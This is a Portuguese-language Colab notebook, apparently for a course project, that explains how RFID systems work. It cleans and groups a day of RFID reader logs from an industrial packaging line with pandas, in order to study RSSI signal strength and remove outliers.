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)
# + [markdown] id="KTMbVPf596Cy"
# ## O sistema RFID
# O RFID (Radio Frequency Idenfitication) é composto basicamente por 3 componentes.
#
# **Etiquetas:** também conhecidas popularmente como Tags e tecnicamente como transponder. Elas possuem em sua composição um circuito integrado (microchip) ligado à uma pequena antena. Esse chip possui uma memória onde as características de identificação do produto estarão armazenadas e ela transmite essas informações para o Leitor (Reader) quando solicitado.
#
# 
#
#
# **Leitores (Reader):** é denominado como um sofisticado equipamento de rádio que possui em suas principais características a criação, ampliação e envios dos sinais de radiofrequência, receber os sinais das etiquetas e de-modular a informação e organizar os dados recebidos a fim de enviá-los para um computador.
# Uma outra característica dos leitores é de fazer escrita ou gravação de informação nas etiquetas. Abaixo um exemplo de um leitor de RFID.
#
# 
#
# **Antenas:** elas são os condutores da comunicação de dados entre as etiquetas e o leitor. Existem vários tipos de antenas e, devido a isso, é muito importante conhecê-las, pois dependendo da sua aplicação o tipo da antena influenciará muito na performance de leitura. Outro fator importante é o posicionamento da mesma, pois ele impacta na força de retorno de sinal de leitura, o que chamaremos mais adiante de **RSSI**.
#
# 
#
# O **RSSI (Received Signal Strength Indicator)** é na prática um valor que indica a força do sinal de resposta. É usado para estimar a distância entre uma etiqueta e a antena ou simplesmente para restringir a leitura em uma determinada distância. Em algumas aplicações ele pode ser usado para identificar a direção da etiqueta e até mesmo como filtro de validação para criar boas condições de leitura e gravação.
# + [markdown] id="cjy42gHUA5h8"
# ## Caso de estudo
# O trabalho desenvolvido se baseia em um log capturado durante um dia de funcionamento em uma linha de produção industrial de embalagens, em uma fábrica na cidade de Sorocaba/SP.
# <br>Esta linha de produção utiliza um sistema RFID, com Tags inteligentes, que são coladas nas embalagens produzidas para auxiliar o seu rastreamento ao longo do processo de produção automatizado.
# <br>Os dados foram capturados de um leitor RFID ao longo do processo e registra informações como o código único de cada tag chamado EPC, a potência de resposta de leitura da tag (RSSI), o tempo exato de registro de leitura e um status de sucesso na operação de leitura.
# <br>Para cada tag que passa pela antena de leitura sobre a esteira, várias leituras são realizada da mesma tag, sendo que é necessária uma potência de resposta mínima para ser considerara como uma leitura eficaz e válida para o sistema de rastreabilidade.
# <br>A potência de retorno do sinal, que é o foco principal do trabalho apresentado, pode ter influência de diversos fatores, como a qualidade em si da tag, a variação de posicionamento e distância da antena, a velocidade da esteira e a configuração do leitor (Reader).
# + [markdown] id="Gui5UKIH0Cow"
# # Desenvolvimento
# + [markdown] id="QgodK3z2HhKL"
# ## Pré-processamento dos dados
# + [markdown] id="p_mf7K1cHhKL"
# Os dados coletados dos equipamentos chamados READERS geram um log onde as informações são descritas conforme abaixo:
#
# - Hora no formato (HH:MM:SS.mmm)
# - TAG = Informação do número armazenado na memória da TAG é um identificador único denominado de EPC.
# - ANTENNA = Registro da antena que a informação foi capturada.
# - RSSI = Informação de retorno de potência.
# - TIMESTAMP = Momento em que a informação foi capturada.
#
# É através do parâmetro de RSSI que se pode identificar se a leitura realizada pela antena está boa ou não.
#
# Inicialmente carregaremos o log e iremos fazer um pré-processamento para excluir as linhas que não são referentes às leituras da antena e deixá-lo em um formato mais fácil de se trabalhar.
# + id="RKiPuFB9HhKM" executionInfo={"status": "ok", "timestamp": 1607186252405, "user_tz": 180, "elapsed": 892, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Bibliotecas que serão utilizadas
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings('ignore')
np.set_printoptions(threshold=11)
# + id="l7gb7Ba4IDx-" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186284067, "user_tz": 180, "elapsed": 32542, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="938465b4-2ab0-4a0b-c61d-d8ddc97bb6b1"
# Abrindo a estrutura de pastas do google drive
from google.colab import drive
drive.mount('/content/gdrive')
# + id="7qG3YREaphpI" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186355690, "user_tz": 180, "elapsed": 1010, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="97cb651b-6440-4b9b-d7fa-915d442e1703"
# cd gdrive/My Drive/TCC
# + [markdown] id="Ixnw_K-Ithzw"
# ### Limpeza e Transformação do Log
# + [markdown] id="PNkEe4vHHhKO"
# Carregamento dos dados, arquivo de log esta separado por vírgula, e seus valores estão com "sujeira" e precisam ser tratados posteriormente
# + id="seMk3XmhHhKP" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186402247, "user_tz": 180, "elapsed": 8534, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b05d9b05-9dfc-4deb-83cb-bbf6096a1b9e"
dfTemp = pd.read_csv('Dataset/DeviceReader.txt', names=['EPC', 'ANTENNA', 'RSSI', 'TIMESTAMP'], sep=',')
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head()
# + id="UYfWh6oNHhKR" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607186407626, "user_tz": 180, "elapsed": 996, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="fcf82b6d-11e4-416a-9d6e-eadf153cfff3"
dfTemp.tail(5)
# + [markdown] id="g2Hc1gf2tqKo"
# #### 1ª Etapa
# + [markdown] id="p4NZ0nYlHhKU"
# A EPC é uma tag de evento de leitura de antena RFID, que registra cada leitura de maneira sequêncial, sendo que cada tag é única.
#
# Para a preparação do banco de dados, a primeira etapa a ser realizada é separar a EPC do restante da string, podendo saber assim a tag de cada leitura.
# + id="8vCzCIdEHhKU" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186443188, "user_tz": 180, "elapsed": 8563, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="020567ef-3810-4687-e201-316b4e21a045"
dfTemp['TIME'], dfTemp['EPC'] = dfTemp['EPC'].str.split(';',1).str
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="_vASChCyt6Hl"
# #### 2ª Etapa
# + [markdown] id="fuxcQSGVHhKW"
# No log registrado pelo equipamento, quando uma leitura é validada pelo sistema, uma string é iniciada com "RFIDValidation". O valor da potência de resposta (RSSI) é adotado como o valor da próxima string.
#
# A segunda etapa de preparação do banco de dados é criar uma coluna VALIDATION, sendo que quando houver um valor de potência de resposta adotado (RSSI), o valor de VALIDATION deverá ser 1.
# + id="LhYVqiirHhKW" colab={"base_uri": "https://localhost:8080/", "height": 1000} executionInfo={"status": "ok", "timestamp": 1607186452772, "user_tz": 180, "elapsed": 3690, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="0ed8577c-9d40-44bf-8167-b5302bf321e1"
dfTemp['VALIDATION'] = 0
dfTemp.loc[dfTemp['EPC'].str.contains("RFIDValidation"), 'VALIDATION'] = 1
dfTemp['VALIDATION'] = dfTemp['VALIDATION'].shift()
dfTemp.dropna(inplace=True)
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(40)
# + [markdown] id="fBLnQsw6uUJl"
# #### 3ª Etapa
# + [markdown] id="jyU9qQh3HhKY"
# A etapa seguinte de preparação do banco de dados consiste e manter apenas os logs que contenham a substring "TAG=", eliminando assim os demais casos
# + id="bOyNv9ZZHhKZ" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186467168, "user_tz": 180, "elapsed": 2271, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d50d18e7-470f-4cac-e0b1-27ac891c6898"
dfTemp = dfTemp[dfTemp['EPC'].str.contains("TAG=")]
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="HT1tIueMuhlm"
# #### 4ª Etapa
# + [markdown] id="2qnhypEnHhKb"
# Nesta etapa, foram removidos os marcadores específicos de cada coluna, mantendo apenas os respectivos valores.
# + id="HzBfBY5pHhKc" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186484945, "user_tz": 180, "elapsed": 7497, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d6181439-ffae-4ab9-c2e1-1685a6b19d80"
dfTemp['EPC'] = dfTemp['EPC'].str.replace('TAG=', '')
dfTemp['RSSI'] = dfTemp['RSSI'].str.replace('RSSI=', '')
dfTemp['TIMESTAMP'] = dfTemp['TIMESTAMP'].str.replace('TIMESTAMP=', '')
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="cNrvqsJjvJFL"
# #### 5ª Etapa
# + [markdown] id="HerqOANNHhKe"
# Para melhorar a visualização do banco de dados, um novo dataset foi criado, alterando-se a ordem das colunas e reiniciando os índices de linha, por fim, salvando o dataset gerado.
# Finalizando o primeiro processo de transformação vou salvar os dados em um novo dataset corrigindo a ordem das colunas para uma melhor visualização, excluindo as que não serão necessárias e atualizando os tipos das colunas para melhor trabalhar com os dados posteriormente. E por fim será feito um reset no index.
# + id="ysNznNOsHhKf" colab={"base_uri": "https://localhost:8080/", "height": 408} executionInfo={"status": "ok", "timestamp": 1607186494693, "user_tz": 180, "elapsed": 980, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="74fbd576-4e15-4cfe-bc8b-a51560766cdd"
df = dfTemp[['TIMESTAMP','EPC','RSSI','VALIDATION']]
print(df.info())
df.head(5)
# + id="FW-J7DuVHhKi" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186504606, "user_tz": 180, "elapsed": 3258, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9f44cd65-f078-47cf-eb86-3c1a31346a67"
df['TIMESTAMP'] = pd.to_numeric(df['TIMESTAMP'])
df['RSSI'] = pd.to_numeric(df['RSSI'])
df['VALIDATION'] = df['VALIDATION'].astype(int)
df.info()
# + id="CwlqhhpBHhKk" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186512086, "user_tz": 180, "elapsed": 1003, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2a0661f9-6dd2-4dbe-d48d-027a5399e765"
df.reset_index(drop=True)
print ('Linhas: ', df.shape[0])
df.head(5)
# + [markdown] id="Vq879qxeHhKm"
# Salvarei os dados em um novo arquivo para não precisar refazer esses passos novamente.
# + id="i359FvZJHhKm" executionInfo={"status": "ok", "timestamp": 1607186626035, "user_tz": 180, "elapsed": 9484, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df.to_csv('Dataset/Output.csv')
# + [markdown] id="xuLSCFBEvWi5"
# ### Agrupamento dos Dados
# + [markdown] id="lD1ZmGbjHhKo"
# Nessa segunda fase do pré-processamento a idéia é fazer um agrupamento dos dados por EPC e identificar os valores de RSSI máximo (que determina o melhor momento de validação), Mínimo (que identifica o valor da pior leitura), Médio (que determina a média das leituras por EPC), Contagem (para identificar quantas vezes aquele EPC foi capturado pela antena), Valor de Validação (que será o valor do RSSI onde o sistema considerou como item válido) e o Timestamp (valor do momento que a leitura aconteceu).
#
# O timestamp será o índice desse dataset agrupado e será importante dado para o modelo de série temporal que será utilizado para prever as próximas leituras.
# + [markdown] id="i1SMYXf-HhKp"
# Iniciarei com o carregamente do Dataset.
# + id="_5ID9bldHhKq" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186643171, "user_tz": 180, "elapsed": 2984, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="035c5048-d5d3-4aff-be07-92547a1dd0ed"
df = pd.read_csv('Dataset/Output.csv', index_col=0)
print ("Tamanho Original (Linhas x Colunas): ", df.shape)
df.head()
# + [markdown] id="IMql_G2uwOTf"
# #### 1ª Etapa
# + [markdown] id="kGTdg3EfHhKs"
# Para facilitar a captura dos valores que precisarei vou atualizar o valor do Campo VALIDATION com o valor do RSSI correspondente.
# Com isso conseguirei pegar qual foi o RSSI no momento da validação.
# + id="qYJC47pRHhKt" executionInfo={"status": "ok", "timestamp": 1607186650528, "user_tz": 180, "elapsed": 997, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df['VALIDATION'] = df.RSSI[df['VALIDATION']==1]
# + [markdown] id="_NwIPbh97Emp"
# #### 2ª Etapa
# + [markdown] id="uePreYIhHhKv"
# O agrupamento pelo EPC pegando os valores MIN, MAX, MEAN e COUNT.
#
# O valor MIN é importante pois representa para aquele EPC qual foi a pior leitura dentre todas as leituras feitas. Como a leitura é feita em movimento, os EPCs terão uma leitura ruim enquanto estiver afastado da antena.
#
# O valor MAX representa o ponto de melhor leitura do EPC, ou seja, o ponto onde ele esta posicionado bem acima da antena. Esse normalmente é a melhor posição para validação de leitura e é através dele que se estipula o valor limite para validação do sistema que controla essas leituras e considera a TAG como boa ou ruim.
#
# O valor MEAN (média) é o valor médio entre as leituras feitas para cada EPC em relação a quantidade de leituras feitas.
#
# O COUNT representa quantas leituras a antena recebeu da TAG. Ele servirá de filtro para remoção de outliers. Por exemplo, as vezes, a máquina pode parar por problema mecânico e nesse caso a antena fará muitas leituras das TAGs que estiverem próximas. Mas como a máquina esta parada, essas leituras não são válidas para analise e estudo do comportamento e previsão.
# + [markdown] id="V_PDw-E97PNL"
# Será criado um novo dataset temporário contemplando esse agrupamento.
# + id="9SQ7S-eDHhKw" colab={"base_uri": "https://localhost:8080/", "height": 252} executionInfo={"status": "ok", "timestamp": 1607186661224, "user_tz": 180, "elapsed": 1509, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c96b33b8-2cfa-4a86-9f2e-b1457c9299aa"
df1 = df.groupby(['EPC'])['RSSI'].agg(['min','max','mean','count'])
print (df1.shape)
df1.head()
# + [markdown] id="ksbzmVLD7auL"
# #### 3ª Etapa
# + [markdown] id="rCNKYlMyHhKx"
# Foi escolhido como data (timestamp) o tempo da primeira leitura recebida pela antena de cada EPC. E um novo dataset será criado contendo essa informação.
# + id="Goo20uAvHhKy" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186669595, "user_tz": 180, "elapsed": 1314, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="77ed94e5-523f-4521-be06-683b63694c46"
df2 = df.groupby(['EPC'])['TIMESTAMP'].min()
print (df2.shape)
df2.head()
# + [markdown] id="ibS4s1QZ7ojD"
# #### 4ª Etapa
# + [markdown] id="BuXDbIj9HhK0"
# Para cada EPC foi salvo o valor do RSSI do momento que o sistema validou a TAG. Esse valor é importante, pois serve como base de estudo do quão distante do valor MAX (melhot ponto de validação) ele está. Hoje ele é utilizado para ajustes de posicionamento de antena e configuração de filtro de validação.
#
# Quanto mais próximo do valor MAX, mas ideal estará a configuração (setup) da máquina.
#
# Um terceiro dataset temporário foi criado para armazenar essa informação.
# + id="DCMpyZN1HhK1" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186681293, "user_tz": 180, "elapsed": 848, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cff9077e-e08b-4aff-bcc2-d6c775697b91"
df3 = df.groupby(['EPC'])['VALIDATION'].max()
print (df3.shape)
df3.head()
# + [markdown] id="wrr6cASQ8GeJ"
# #### 5ª Etapa
#
# + [markdown] id="uFaN06XfHhK2"
# Por fim, todas essas colunas foram concatenadas, nomes alterados, e definido o Timestamp como indice. Um novo arquivo de saída foi gerado para facilitar nas etapas posteriores.
# + id="6Axn6gkqHhK3" colab={"base_uri": "https://localhost:8080/", "height": 252} executionInfo={"status": "ok", "timestamp": 1607186690977, "user_tz": 180, "elapsed": 907, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9484ff05-1628-4c7d-bcee-52ad7748e5d3"
df_final = pd.concat([df2, df3, df1], axis=1)
print (df_final.shape)
df_final.head()
# + id="OKTmVC6ZHhK4" colab={"base_uri": "https://localhost:8080/", "height": 235} executionInfo={"status": "ok", "timestamp": 1607186695940, "user_tz": 180, "elapsed": 1167, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="173edec4-acc3-4646-8602-372d39089f09"
df_final = df_final.reset_index()
df_final = df_final.set_index(['TIMESTAMP'], drop=True)
df_final = df_final.rename(columns={"min": "MIN", "max": "MAX", "mean":"MEAN", "count":"COUNT"})
df_final.head()
# + id="El4cEcI-HhK6" executionInfo={"status": "ok", "timestamp": 1607186701505, "user_tz": 180, "elapsed": 1061, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_final.to_csv('Dataset/GroupOutput.csv')
# + [markdown] id="3rrTI-aP8c5P"
# ### Análise para Remoção de Outliers
# + [markdown] id="UodX_2HXHhK8"
# Agora, faremos algumas análises no dataset resultante para definir a melhor estratégia de separação dos dados e remoção de outliers.
#
# Iniciando pelo carregamento dos dados salvos.
# + id="0_t4cm5UHhK8" colab={"base_uri": "https://localhost:8080/", "height": 235} executionInfo={"status": "ok", "timestamp": 1607186717882, "user_tz": 180, "elapsed": 1018, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="38b9ce9f-9523-437f-e810-c8dced48778b"
df_final = pd.read_csv('Dataset/GroupOutput.csv', index_col=0)
df_final.head(5)
# + id="ZREocnPVHhK-" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607186721865, "user_tz": 180, "elapsed": 999, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f500d287-c917-422b-8b6f-229fc78ec286"
df_final = df_final.reset_index()
df_final.head()
# + [markdown] id="mvDeXT3-85WS"
# Observando a análise estatística dos dados abaixo, nele demonstra que existem itens (EPCs) que fizeram uma quantidade muito grande de leituras, muito acima da média que é de 53.8 leituras. Isso se caracteriza por momentos que talvez a máquina ficou parada com a TAG posicionada em cima da antena e ela ficou capturando valores da mesma TAG.
# + id="2GFskcRCHhLA" colab={"base_uri": "https://localhost:8080/", "height": 297} executionInfo={"status": "ok", "timestamp": 1607186725844, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="19169b45-dbdb-4ecd-cf33-f2028564551f"
df_final.describe()
# + [markdown] id="58SzXLM29kFy"
# A estratégia utilizada para remoção desses itens é manter no dataset apenas os itens cuja contagem for menor ou igual a 60. Esse valor foi escolhido, pois a maior parte dos dados se encontram próximos a esse valor o que demonstra que é um bom parâmetro de leitura da antena.
